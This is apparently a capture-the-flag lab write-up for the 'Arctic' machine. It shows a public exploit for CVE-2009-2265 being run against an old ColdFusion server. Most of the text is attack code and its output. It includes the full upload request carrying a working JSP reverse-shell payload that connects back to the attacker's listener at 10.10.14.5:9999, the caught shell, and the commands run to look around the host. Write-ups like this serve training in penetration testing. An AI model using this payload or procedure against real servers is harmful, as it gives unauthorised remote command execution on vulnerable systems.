InfoSec LAB

Arctic_Exploitation

Created: 3 min read

Remote Code Execution

Executing the exploit

┌──(kali㉿kali)-[~/archive/htb/labs/arctic]
└─$ python3 CVE-2009-2265.py
 
Generating a payload...
payload size: 1496 bytes
saved as: 0b13a7f6a7324d4aaaba2c57e8b27d54.jsp
 
Priting request...
content-type: multipart/form-data; boundary=546972aa32b84c5a855381abdd07782b
content-length: 1697
 
--546972aa32b84c5a855381abdd07782b
content-disposition: form-data; name="newfile"; filename="0b13a7f6a7324d4aaaba2c57e8b27d54.txt"
content-type: text/plain
 
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
 
<%
  class StreamConnector extends Thread
  {
    InputStream pq;
    OutputStream aq;
 
    StreamConnector( InputStream pq, OutputStream aq )
    {
      this.pq = pq;
      this.aq = aq;
    }
 
    public void run()
    {
      BufferedReader fW  = null;
      BufferedWriter k_w = null;
      try
      {
        fW  = new BufferedReader( new InputStreamReader( this.pq ) );
        k_w = new BufferedWriter( new OutputStreamWriter( this.aq ) );
        char buffer[] = new char[8192];
        int length;
        while( ( length = fW.read( buffer, 0, buffer.length ) ) > 0 )
        {
          k_w.write( buffer, 0, length );
          k_w.flush();
        }
      } catch( Exception e ){}
      try
      {
        if( fW != null )
          fW.close();
        if( k_w != null )
          k_w.close();
      } catch( Exception e ){}
    }
  }
 
  try
  {
    String ShellPath;
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
  ShellPath = new String("/bin/sh");
} else {
  ShellPath = new String("cmd.exe");
}
 
    Socket socket = new Socket( "10.10.14.5", 9999 );
    Process process = Runtime.getRuntime().exec( ShellPath );
    ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
    ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
  } catch( Exception e ) {}
%>
 
--546972aa32b84c5a855381abdd07782b--
 
 
Sending request and printing response...
 
 
		<script type="text/javascript">
			window.parent.OnUploadCompleted( 0, "/userfiles/file/0b13a7f6a7324d4aaaba2c57e8b27d54.jsp/0b13a7f6a7324d4aaaba2c57e8b27d54.txt", "0b13a7f6a7324d4aaaba2c57e8b27d54.txt", "0" );
		</script>
	
 
Printing some information for debugging...
lhost: 10.10.14.5
lport: 9999
rhost: 10.10.10.11
rport: 8500
payload: 0b13a7f6a7324d4aaaba2c57e8b27d54.jsp
 
Deleting the payload...
 
Listening for connection...
 
Executing the payload...
listening on [any] 9999 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.11] 49350
 
 
 
 
 
 
 
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
c:\ColdFusion8\runtime\bin> whoami
 whoami
arctic\tolis
 
c:\ColdFusion8\runtime\bin> hostname
 hostname
arctic
 
c:\ColdFusion8\runtime\bin> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
ethernet adapter local area connection:
 
   connection-specific dns suffix  . : 
   ipv4 address. . . . . . . . . . . : 10.10.10.11
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : 10.10.10.2
 
tunnel adapter isatap.{79f1b374-ac3c-416c-8812-bf482d048a22}:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . : 
 
tunnel adapter local area connection* 9:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . :

Initial Foothold established as tolis via exploiting CVE-2009-2265 on the target web application

Interactive Graph View

Backlinks